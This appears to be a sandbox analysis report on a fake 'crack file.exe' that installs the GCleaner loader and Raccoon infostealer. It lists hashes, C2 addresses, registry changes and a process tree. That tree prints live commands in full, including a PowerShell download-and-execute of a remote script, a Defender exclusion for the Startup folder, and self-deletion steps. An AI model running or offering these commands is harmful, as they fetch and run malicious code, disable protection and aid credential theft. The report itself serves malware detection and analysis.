gcleaner | a8ce713a2d85e1c00b2a3075334ee1a6879cb34abdf70431e2184d5bcc83940e

Analysis

max time kernel
257s
max time network
259s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
22-03-2023 15:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

crack file.exe
Size

1.7MB
MD5

3be7815f097914ca1bce77bbfab48ba4
SHA1

9822603ebcc7bc1b0b109131e292db562cc0c55b
SHA256

a8ce713a2d85e1c00b2a3075334ee1a6879cb34abdf70431e2184d5bcc83940e
SHA512

4f0d1caf21366fa19c9862dc1892f2dba36c547f7b8d8086f5552834772a25b515597befd259f9e5b61b09118e73b4c81ed3accfef09f56b6233513e1c98bfd4
SSDEEP

49152:NJ4HLNsPv/IIv0ZDgYdIvDD/CT40j0KzPLxN9tn:NJ4Hxs78Pi/r20KbLnn

Score

10^/10

gcleaner raccoon cf8e11f4b26a8b6523ebca1d025854f5 loader spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://neutropharma.com/wp/wp-content/debug2.ps1

Extracted

Family

raccoon

Botnet

cf8e11f4b26a8b6523ebca1d025854f5

http://109.234.39.45/

rc4.plain

Extracted

Family

gcleaner

45.12.253.56

45.12.253.72

45.12.253.98

45.12.253.75

Signatures

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3680	5024	rundll32.exe	39

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow	pid	Process
34	3544	powershell.exe
37	3544	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

crack file.exeCrack.exesqlcmd.exekokos.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	crack file.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	Crack.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	sqlcmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	kokos.exe

Drops startup file 2 IoCs

Processes:

8840.tmp.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iwmVB60Q4dwZ1qLfKPzI.exe	8840.tmp.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iwmVB60Q4dwZ1qLfKPzI.exe	8840.tmp.exe

Executes dropped EXE 8 IoCs

Processes:

Crack.exeCrack.exesoft.exesqlcmd.exe8840.tmp.exeKiffAppE2.exekokos.exess29.exe

pid	Process
428	Crack.exe
4964	Crack.exe
4848	soft.exe
4576	sqlcmd.exe
4772	8840.tmp.exe
2884	KiffAppE2.exe
3580	kokos.exe
5104	ss29.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid	Process
4648	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
39	api.ipify.org
40	api.ipify.org

Suspicious use of SetThreadContext 1 IoCs

Processes:

soft.exe

description	pid	Process	procid_target
PID 4848 set thread context of 952	4848	soft.exe	102

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 10 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
4472	4648	WerFault.exe	109
1536	3580	WerFault.exe	116
4848	3580	WerFault.exe	116
1584	3580	WerFault.exe	116
1004	3580	WerFault.exe	116
3712	3580	WerFault.exe	116
4608	3580	WerFault.exe	116
4656	3580	WerFault.exe	116
4644	3580	WerFault.exe	116
3592	3580	WerFault.exe	116

Kills process with taskkill 1 IoCs

evasion

Processes:

taskkill.exe

pid	Process
4304	taskkill.exe

Modifies registry class 44 IoCs

Processes:

Crack.exeCrack.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sqltest.Application	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\LocalServer32	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\FLAGS	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\HELPDIR	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\ = "Isqltest"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\ProgID\ = "sqltest.Application"	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\TypeLib\Version = "1.0"	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\ProgID	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\ProgID\ = "sqltest.Application"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\InprocHandler32\ = "ole32.dll"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\ = "Isqltest"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\TypeLib\Version = "1.0"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\FLAGS\ = "0"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sqltest.Application\CLSID	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sqltest.Application\ = "sqltest.Application"	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\ProgID	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\InprocHandler32	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\0	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\0\win32	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\HELPDIR\	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\ = "sqltest.Application"	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sqltest.Application\CLSID	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\LocalServer32	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\Crack.exe"	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\ProxyStubClsid32	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\TypeLib	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\InprocHandler32\ = "ole32.dll"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\TypeLib	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\TypeLib\ = "{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sqltest.Application\CLSID\ = "{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}"	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\ = "sqltest"	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\InprocHandler32	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\Crack.exe"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\Crack.exe"	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\ProxyStubClsid32	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\TypeLib\ = "{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sqltest.Application\CLSID\ = "{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}"	Crack.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
5100	PING.EXE

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	26	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 33 IoCs

Processes:

soft.exepowershell.exepowershell.exe

pid	Process
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
4848	soft.exe
3544	powershell.exe
3544	powershell.exe
220	powershell.exe
220	powershell.exe
220	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

soft.exepowershell.exeKiffAppE2.exepowershell.exetaskkill.exe

description	pid	Process
Token: SeDebugPrivilege	4848	soft.exe
Token: SeDebugPrivilege	3544	powershell.exe
Token: SeDebugPrivilege	2884	KiffAppE2.exe
Token: SeDebugPrivilege	220	powershell.exe
Token: SeDebugPrivilege	4304	taskkill.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

Crack.exeCrack.exe

pid	Process
428	Crack.exe
428	Crack.exe
4964	Crack.exe
4964	Crack.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

crack file.exeCrack.exesoft.exesqlcmd.execmd.exerundll32.execmd.exe

description	pid	Process	procid_target
PID 1524 wrote to memory of 428	1524	crack file.exe	84
PID 1524 wrote to memory of 428	1524	crack file.exe	84
PID 1524 wrote to memory of 428	1524	crack file.exe	84
PID 428 wrote to memory of 4964	428	Crack.exe	86
PID 428 wrote to memory of 4964	428	Crack.exe	86
PID 428 wrote to memory of 4964	428	Crack.exe	86
PID 1524 wrote to memory of 4848	1524	crack file.exe	87
PID 1524 wrote to memory of 4848	1524	crack file.exe	87
PID 4848 wrote to memory of 5044	4848	soft.exe	88
PID 4848 wrote to memory of 5044	4848	soft.exe	88
PID 4848 wrote to memory of 4188	4848	soft.exe	89
PID 4848 wrote to memory of 4188	4848	soft.exe	89
PID 4848 wrote to memory of 4360	4848	soft.exe	90
PID 4848 wrote to memory of 4360	4848	soft.exe	90
PID 4848 wrote to memory of 1704	4848	soft.exe	91
PID 4848 wrote to memory of 1704	4848	soft.exe	91
PID 4848 wrote to memory of 2176	4848	soft.exe	92
PID 4848 wrote to memory of 2176	4848	soft.exe	92
PID 4848 wrote to memory of 636	4848	soft.exe	93
PID 4848 wrote to memory of 636	4848	soft.exe	93
PID 4848 wrote to memory of 4808	4848	soft.exe	94
PID 4848 wrote to memory of 4808	4848	soft.exe	94
PID 4848 wrote to memory of 4720	4848	soft.exe	95
PID 4848 wrote to memory of 4720	4848	soft.exe	95
PID 4848 wrote to memory of 3260	4848	soft.exe	96
PID 4848 wrote to memory of 3260	4848	soft.exe	96
PID 4848 wrote to memory of 4624	4848	soft.exe	97
PID 4848 wrote to memory of 4624	4848	soft.exe	97
PID 4848 wrote to memory of 4840	4848	soft.exe	98
PID 4848 wrote to memory of 4840	4848	soft.exe	98
PID 4848 wrote to memory of 4892	4848	soft.exe	99
PID 4848 wrote to memory of 4892	4848	soft.exe	99
PID 4848 wrote to memory of 3988	4848	soft.exe	100
PID 4848 wrote to memory of 3988	4848	soft.exe	100
PID 4848 wrote to memory of 3264	4848	soft.exe	101
PID 4848 wrote to memory of 3264	4848	soft.exe	101
PID 4848 wrote to memory of 952	4848	soft.exe	102
PID 4848 wrote to memory of 952	4848	soft.exe	102
PID 4848 wrote to memory of 952	4848	soft.exe	102
PID 4848 wrote to memory of 952	4848	soft.exe	102
PID 4848 wrote to memory of 952	4848	soft.exe	102
PID 4848 wrote to memory of 952	4848	soft.exe	102
PID 4848 wrote to memory of 952	4848	soft.exe	102
PID 4848 wrote to memory of 952	4848	soft.exe	102
PID 4848 wrote to memory of 952	4848	soft.exe	102
PID 1524 wrote to memory of 4576	1524	crack file.exe	103
PID 1524 wrote to memory of 4576	1524	crack file.exe	103
PID 1524 wrote to memory of 4576	1524	crack file.exe	103
PID 4576 wrote to memory of 3180	4576	sqlcmd.exe	104
PID 4576 wrote to memory of 3180	4576	sqlcmd.exe	104
PID 3180 wrote to memory of 3544	3180	cmd.exe	106
PID 3180 wrote to memory of 3544	3180	cmd.exe	106
PID 4576 wrote to memory of 4772	4576	sqlcmd.exe	107
PID 4576 wrote to memory of 4772	4576	sqlcmd.exe	107
PID 4576 wrote to memory of 4772	4576	sqlcmd.exe	107
PID 3680 wrote to memory of 4648	3680	rundll32.exe	109
PID 3680 wrote to memory of 4648	3680	rundll32.exe	109
PID 3680 wrote to memory of 4648	3680	rundll32.exe	109
PID 4576 wrote to memory of 3748	4576	sqlcmd.exe	113
PID 4576 wrote to memory of 3748	4576	sqlcmd.exe	113
PID 4576 wrote to memory of 3748	4576	sqlcmd.exe	113
PID 1524 wrote to memory of 2884	1524	crack file.exe	114
PID 1524 wrote to memory of 2884	1524	crack file.exe	114
PID 3748 wrote to memory of 5100	3748	cmd.exe	115

C:\Users\Admin\AppData\Local\Temp\crack file.exe
"C:\Users\Admin\AppData\Local\Temp\crack file.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1524
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:428
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -h
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:4964
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\soft.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\soft.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4848
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe"
    3⤵
    PID:5044
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe"
    3⤵
    PID:4188
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe"
    3⤵
    PID:4360
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"
    3⤵
    PID:1704
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe"
    3⤵
    PID:2176
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
    3⤵
    PID:636
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
    3⤵
    PID:4808
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe"
    3⤵
    PID:4720
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe"
    3⤵
    PID:3260
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
    3⤵
    PID:4624
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"
    3⤵
    PID:4840
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:4892
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"
    3⤵
    PID:3988
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe"
    3⤵
    PID:3264
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe"
    3⤵
    PID:952
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\sqlcmd.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\sqlcmd.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4576
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://neutropharma.com/wp/wp-content/debug2.ps1')"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3180
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command IEX(New-Object Net.Webclient).DownloadString('https://neutropharma.com/wp/wp-content/debug2.ps1')
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3544
- - C:\ProgramData\8840.tmp.exe
    "C:\ProgramData\8840.tmp.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    PID:4772
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\sqlcmd.exe" >> NUL
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3748
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:5100
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\KiffAppE2.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\KiffAppE2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2884
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\kokos.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\kokos.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3580
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3580 -s 452
    3⤵
    - Program crash
    PID:1536
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3580 -s 764
    3⤵
    - Program crash
    PID:4848
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3580 -s 764
    3⤵
    - Program crash
    PID:1584
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3580 -s 812
    3⤵
    - Program crash
    PID:1004
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3580 -s 816
    3⤵
    - Program crash
    PID:3712
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3580 -s 944
    3⤵
    - Program crash
    PID:4608
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3580 -s 944
    3⤵
    - Program crash
    PID:4656
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3580 -s 1372
    3⤵
    - Program crash
    PID:4644
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "kokos.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\RarSFX0\kokos.exe" & exit
    3⤵
    PID:3300
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "kokos.exe" /f
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4304
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3580 -s 512
    3⤵
    - Program crash
    PID:3592
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss29.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss29.exe"
  2⤵
  - Executes dropped EXE
  PID:5104

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3680
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
  2⤵
  - Loads dropped DLL
  PID:4648
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4648 -s 612
    3⤵
    - Program crash
    PID:4472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4648 -ip 4648
1⤵
PID:2664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3580 -ip 3580
1⤵
PID:4124

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
PID:4324
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
  2⤵
  PID:2504
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3580 -ip 3580
1⤵
PID:3360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3580 -ip 3580
1⤵
PID:1964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3580 -ip 3580
1⤵
PID:3520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 3580 -ip 3580
1⤵
PID:3064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3580 -ip 3580
1⤵
PID:3936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3580 -ip 3580
1⤵
PID:3620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3580 -ip 3580
1⤵
PID:3964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3580 -ip 3580
1⤵
PID:3724

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scripting

T1064

Persistence

Privilege Escalation

Defense Evasion

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\8840.tmp.exe

Filesize
112KB

MD5
24ca66dc652241a26ea06a4977dfd31e

SHA1
d01574af746276dc5db6e081140ae066827c469b

SHA256
7d649f30575d3404ee580334085740b2143b45004593b9c00bc70991052a5872

SHA512
4f0e69e99eefc295f350e773d6dac6d1fc99dfb37a206402821a7e657c67c0b8b101326617f4fc795fecc2566c8c33418ad0be58a66cf3b19e10b1e7fbf54a93

Download Submit
C:\ProgramData\8840.tmp.exe

Filesize
112KB

MD5
24ca66dc652241a26ea06a4977dfd31e

SHA1
d01574af746276dc5db6e081140ae066827c469b

SHA256
7d649f30575d3404ee580334085740b2143b45004593b9c00bc70991052a5872

SHA512
